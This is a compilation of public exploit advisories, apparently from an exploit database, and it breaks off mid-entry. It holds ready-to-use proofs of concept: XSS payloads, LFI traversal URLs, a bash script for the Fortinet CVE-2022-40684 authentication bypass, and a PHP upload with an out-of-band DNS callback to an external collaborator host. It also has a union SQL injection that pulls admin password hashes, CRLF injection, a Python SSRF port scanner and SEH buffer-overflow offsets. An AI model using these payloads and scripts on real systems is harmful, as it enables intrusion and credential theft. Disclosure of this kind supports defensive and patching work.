<pre><code># Exploit Title: Rental House Management System - Reflected Cross-Site Scripting (XSS)<br /># Date: 25/03/2023<br /># Exploit Author: İsmail Can Durna<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/admin/rental_house_management_system.zip<br /># Version: 1<br /># Tested on: Windows/Linux<br /># Proof of Concept:<br /># 1- Rental House Management System<br /># 2- Go to http://localhost/rental_house/rental_house/login.php<br /># 3- Add payload to the URL, the XSS Payload:<br />/"><script>alert('XSS')</script><br />Url encoded: /%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br /># 4- XSS has been triggered.<br /># Go to this url "http://localhost/rental_house/rental_house/login.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E"<br />XSS will trigger.<br /></code></pre>
<pre><code># Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: http://wpn-xm.org/<br /># Software Link : https://github.com/WPN-XM/WPN-XM/<br /># Tested Version: 0.8.6<br /># Tested on: Windows 10 using XAMPP<br /><br /># Vulnerability Type: Local File Inclusion (LFI) & directory traversal<br />(path traversal)<br /><br />CVSS v3: 7.5<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N<br />CWE: CWE-829, CWE-22<br /><br /> Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows<br />unauthenticated directory traversal and Local File Inclusion through the<br />parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello<br />(without php) GET request.<br /><br />Proof of concept:<br /><br />To detect: http://localhost/tools/webinterface/index.php?page=)<br /><br />The parameter "page" can be modified and load a php file in the server.<br /><br />Example, In C:\:hello.php with this content:<br /><br />C:\>type hello.php<br /><?php<br />echo "HELLO FROM C:\\hello.php";<br />?><br /><br /><br />To Get hello.php in c:\ :<br />http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello<br /><br />Note: hello without ".php".<br /><br />And you can see the PHP message into the browser at the start.<br /><br />Response:<br /><br />HELLO FROM C:\hello.php<!DOCTYPE html><br /><html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><br /><head><br /> <meta charset="utf-8" /><br /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /> <meta name="viewport" content="width=device-width, initial-scale=1"><br /><br /> <title>WP?-XM Server Stack for Windows - 0.8.6</title><br /> <meta name="description" content="WP?-XM Server Stack for Windows -<br />Webinterface."><br /> <meta name="author" content="Jens-André Koch" /><br /> <link rel="shortcut icon" href="favicon.ico" /><br /><br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS)<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not<br />sufficiently encode user-controlled inputs, resulting in a reflected<br />Cross-Site Scripting (XSS) vulnerability via the<br />/tools/webinterface/index.php, in multiple parameters.<br /><br />Proof of concept:<br /><br />http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help<br />http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help<br />http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)<br /># Date: 13/10/2022<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.fortinet.com/<br /># Version:<br />#FortiOS from 7.2.0 to 7.2.1<br />#FortiOS from 7.0.0 to 7.0.6<br />#FortiProxy 7.2.0<br />#FortiProxy from 7.0.0 to 7.0.6<br />#FortiSwitchManager 7.2.0<br />#FortiSwitchManager 7.0.0<br /># Tested on: Kali Linux<br /># CVE : CVE-2022-40684<br /><br /># https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass<br /><br /># Usage: ./poc.sh <ip> <port><br /># Example: ./poc.sh 10.10.10.120 8443<br /><br />#!/bin/bash<br /><br />red="\e[0;31m\033[1m"<br />blue="\e[0;34m\033[1m"<br />yellow="\e[0;33m\033[1m"<br />end="\033[0m\e[0m"<br /><br />target=$1<br />port=$2<br /><br />vuln () {<br /><br />echo -e "${yellow}[+] Dumping System Information: ${end}"<br /><br />timeout 10 curl -s -k -X $'GET' \<br /> -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out<br />if [ "$?" == "0" ];then<br /> grep "results" ./$target.out >/dev/null<br /> if [ "$?" == "0" ];then<br /> echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"<br /> else <br /> rm -f ./$target.out<br /> echo -e "${red}Not Vulnerable ${end}"<br /> fi<br /><br />else<br /><br /> echo -e "${red}Not Vulnerable ${end}"<br /> rm -f ./$target.out<br /><br />fi<br /><br /><br />}<br /><br />vuln<br /><br /></code></pre>
<pre><code># Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://github.com/MegaTKC/AeroCMS<br /># Software Link: https://github.com/MegaTKC/AeroCMS<br /># Version: 0.0.1<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example <br />-----------------------------------------------------------------------------------------------------------------------<br />Param: image content uploading image<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116<br />Content-Length: 1156<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post<br />Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_title"<br /><br />mmmmmmmmmmmmmmmmm<br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_category_id"<br /><br />1<br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_user"<br /><br />admin<br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_status"<br /><br />draft<br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"<br />Content-Type: text/plain<br /><br /><?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_tags"<br /><br /><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="post_content"<br /><br /><p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p><br />-----------------------------369779619541997471051134453116<br />Content-Disposition: form-data; name="create_post"<br /><br />Publish Post<br />-----------------------------369779619541997471051134453116--<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://github.com/MegaTKC/AeroCMS<br /># Software Link: https://github.com/MegaTKC/AeroCMS<br /># Version: 0.0.1<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example SQL Injection<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Param: search<br />-----------------------------------------------------------------------------------------------------------------------<br />Req sql ini detect<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/search.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57<br />Origin: http://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: http://127.0.0.1/AeroCMS-master/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 21<br /><br />search=245692'&submit=<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 03:07:06 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Pragma: no-cache<br />Content-Length: 3466<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />[...]<br />Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/search.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57<br />Origin: http://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: http://127.0.0.1/AeroCMS-master/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 21<br /><br />search=245692''&submit=<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 03:07:10 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 94216<br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req exploiting sql ini get data admin<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /AeroCMS-master/search.php HTTP/1.1<br />Host: 127.0.0.1<br />Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57<br />Origin: http://127.0.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />Referer: http://127.0.0.1/AeroCMS-master/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Content-Length: 113<br /><br />search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 05:40:05 GMT<br />Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40<br />X-Powered-By: PHP/5.6.40<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 101144<br />[...]<br /><br /> <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a><br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Other URL and params<br />-----------------------------------------------------------------------------------------------------------------------<br />/AeroCMS-master/admin/posts.php [post_title]<br />/AeroCMS-master/admin/posts.php [filename]<br />/AeroCMS-master/admin/profile.php [filename]<br />/AeroCMS-master/author_posts.php [author]<br />/AeroCMS-master/category.php [category]<br />/AeroCMS-master/post.php [p_id]<br />/AeroCMS-master/search.php [search]<br />/AeroCMS-master/admin/categories.php [cat_title]<br />/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]<br />/AeroCMS-master/admin/posts.php [post_content]<br />/AeroCMS-master/admin/posts.php [p_id]<br />/AeroCMS-master/admin/posts.php [post_category_id]<br />/AeroCMS-master/admin/posts.php [post_title]<br />/AeroCMS-master/admin/posts.php [reset]<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-02-14<br /># Software Link : http://www.desktopcentral.com<br /># Tested Version: 9.1.0 (Build No: 91084)<br /># Tested on: Windows 10<br /><br /># Vulnerability Type: CRLF injection (CRLF) - 1<br /><br />CVSS v3: 6.1<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-93<br /><br />Vulnerability description: CRLF injection vulnerability in ManageEngine<br />Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP<br />headers and conduct HTTP response splitting attacks via the fileName<br />parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.<br /><br />Proof of concept:<br /><br />GET<br />https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true<br />HTTP/1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101<br />Firefox/85.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />DNT: 1<br />Connection: keep-alive<br />Referer:<br />https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering<br />Upgrade-Insecure-Requests: 1<br />Content-Length: 0<br />Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;<br />STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;<br />showRefMsg=false; summarypage=false;<br />DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;<br />JSESSIONID=0B20DEF653941DAF5748931B67972CDB;<br />JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024<br />Host: localhost<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date:<br />Server: Apache<br />Pragma: public<br />Cache-Control: max-age=0<br />Expires: Wed, 31 Dec 1969 16:00:00 PST<br />SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;<br />Secure<br />Set-Cookie: buildNum=91084; Path=/<br />Set-Cookie: showRefMsg=false; Path=/<br />Set-Cookie: summarypage=false; Path=/<br />Set-Cookie: dc_customerid=1; Path=/<br />Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/<br />Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/<br />Set-Cookie: screenResolution=1280x1024; Path=/<br />Content-Disposition: attachment; filename=any<br />Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv<br />X-dc-header: yes<br />Content-Length: 95<br />Keep-Alive: timeout=5, max=20<br />Connection: Keep-Alive<br />Content-Type: text/csv;charset=UTF-8<br /><br /><br /># Vulnerability Type: CRLF injection (CRLF) - 2<br /><br />CVSS v3: 6.1<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-93<br /><br />Vulnerability description: CRLF injection vulnerability in ManageEngine<br />Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP<br />headers and conduct HTTP response splitting attacks via the fileName<br />parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.<br /><br />Proof of concept:<br /><br />GET<br />https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true<br />HTTP/1.1<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101<br />Firefox/85.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />DNT: 1<br />Connection: keep-alive<br />Referer:<br />https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering<br />Upgrade-Insecure-Requests: 1<br />Content-Length: 0<br />Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;<br />STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;<br />showRefMsg=false; summarypage=false;<br />DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;<br />JSESSIONID=0B20DEF653941DAF5748931B67972CDB;<br />JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024<br />Host: localhost<br /><br /><br />HTTP/1.1 200 OK<br />Date:<br />Server: Apache<br />Pragma: public<br />Cache-Control: max-age=0<br />Expires: Wed, 31 Dec 1969 16:00:00 PST<br />SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;<br />Secure<br />Set-Cookie: buildNum=91084; Path=/<br />Set-Cookie: showRefMsg=false; Path=/<br />Set-Cookie: summarypage=false; Path=/<br />Set-Cookie: dc_customerid=1; Path=/<br />Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/<br />Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/<br />Set-Cookie: screenResolution=1280x1024; Path=/<br />Content-Disposition: attachment; filename=any<br />Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013<br />X-dc-header: yes<br />Content-Length: 4470<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: application/pdf;charset=UTF-8<br /><br /><br /><br /># Vulnerability Type: Server-Side Request Forgery (SSRF)<br /><br />CVSS v3: 8.0<br />CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-918 Server-Side Request Forgery (SSRF)<br /><br />Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability<br />in ManageEngine Desktop Central 9.1.0 allows an attacker can force a<br />vulnerable server to trigger malicious requests to third-party servers or<br />to internal resources. This vulnerability allows authenticated attacker<br />with network access via HTTP and can then be leveraged to launch specific<br />attacks such as a cross-site port attack, service enumeration, and various<br />other attacks.<br /><br />Proof of concept:<br /><br />Save this content in a python file (ex. ssrf_manageenginedesktop9.py),<br />change the variable sitevuln value with ip address:<br /><br />import argparse<br />from termcolor import colored<br />import requests<br />import urllib3<br />import datetime<br />urllib3.disable_warnings()<br /><br />print(colored('''<br />------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------<br />''',"red"))<br /><br />def smtpConfig_ssrf(target,port,d):<br /> now1 = datetime.datetime.now()<br /> text = ''<br /> sitevuln = 'localhost'<br /> url = 'https://<br />'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%<br />40manageengine.com<br />&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%<br />40manageengine.com'<br /> cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;<br />buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;<br />JSESSIONID=D10A9C62D985A0966647099E14C622F8;<br />DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'<br /> try:<br /> response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0<br />(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':<br />'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':<br />'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': '<br />https://192.168.56.250:8383/smtpConfig.do','Cookie':<br /> cookie,'Connection': 'keep-alive'},verify=False, timeout=10)<br /><br /> text = response.text<br /> now2 = datetime.datetime.now()<br /> rest = (now2 - now1)<br /> seconds = rest.total_seconds()<br /><br /> if ('updateRefMsgCookie' in text):<br /> return colored('Cookie lost',"yellow")<br /><br /> if d == "0":<br /> print ('Time response: ' + str(rest) + '\n' + text + '\n')<br /><br /> if (seconds > 5.0):<br /> return colored('open',"green")<br /> else:<br /> return colored('closed',"red")<br /><br /> except:<br /> now2 = datetime.datetime.now()<br /> rest = (now2 - now1)<br /> seconds = rest.total_seconds()<br /> if (seconds > 10.0):<br /> return colored('open',"green")<br /> else:<br /> return colored('closed',"red")<br /><br /> return colored('unknown',"yellow")<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -<br />SSRF Open ports",required=True)<br /> parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9<br />- SSRF Open ports",required=True)<br /> parser.add_argument('-d','--debug', help="ManageEngine Desktop Central<br />9 - SSRF Open ports (0 print or 1 no print)",required=False)<br /> args = parser.parse_args()<br /> timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)<br /> print (args.ip + ':' + args.port + ' ' + timeresp + '\n')<br /><br /><br /><br />And:<br /><br />$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080<br /><br />------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------<br /><br />192.168.56.250:8080 open<br /><br />$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777<br /><br />------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------<br /><br />192.168.56.250:7777 closed<br /><br /></code></pre>
<pre><code># Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-09<br /># Vendor Homepage: http://www.explorerplusplus.com/<br /># Software Link : http://www.explorerplusplus.com/<br /># Tested Version: 1.3.5.531<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Buffer overflow controlling the Structured Exception Handler (SEH) records<br />in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers<br />to execute arbitrary code via a long file name argument.<br /><br />Proof of concept:<br /><br />Open Explorer32++.exe from command line with a large string in Arguments,<br />more than 396 chars:<br /><br />File '<Explorer++_PATH>\Explorer32++.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'<br /><br />SEH chain of main thread<br />Address SE handler<br />0018FB14 00690041<br />00370069 *** CORRUPT ENTRY ***<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with<br />unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic<br />data after the handler<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-09<br /># Vendor Homepage: http://frhed.sourceforge.net/<br /># Software Link : http://frhed.sourceforge.net/<br /># Tested Version: 1.6.0<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Buffer overflow controlling the Structured Exception Handler (SEH) records<br />in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow<br />attackers to execute arbitrary code via a long file name argument.<br /><br />Proof of concept:<br /><br />Open Frhed.exe from command line with a large string in Arguments, more<br />than 494 chars:<br /><br />File '<Frhed_PATH>\Frhed.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'<br /><br />SEH chain of main thread<br />Address SE handler<br />0018FC8C 41367141<br />35714134 *** CORRUPT ENTRY ***<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record (nseh field) at 0x0018fc8c overwritten with<br />normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic<br />data after the handler<br /><br />0BADF00D ------------------------------<br /> 'Targets' =><br /> [<br /> [ '<fill in the OS/app version here>',<br /> {<br /> 'Ret' => 0x00401ba7, #<br />pop ecx # pop ecx # ret - Frhed.exe (change this value by other without<br />\x00)<br /> 'Offset' => 494<br /> }<br /> ],<br /> ],<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-06<br /># Vendor Homepage: http://www.angusj.com/resourcehacker/<br /># Software Link : http://www.angusj.com/resourcehacker/<br /># Tested Version: 3.6.0.92<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Heap-based buffer overflow controlling the Structured Exception Handler<br />(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,<br />may allow attackers to execute arbitrary code via a long file name argument.<br /><br />Proof of concept:<br /><br />Open ResHacker.exe from command line with a large string in Arguments, more<br />than 268 chars:<br /><br />File 'C:\ResourceHacker36\ResHacker.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'<br /><br />SEH chain of main thread<br />Address SE handler<br />0018FCB4 316A4130<br />6A413969 *** CORRUPT ENTRY ***<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record 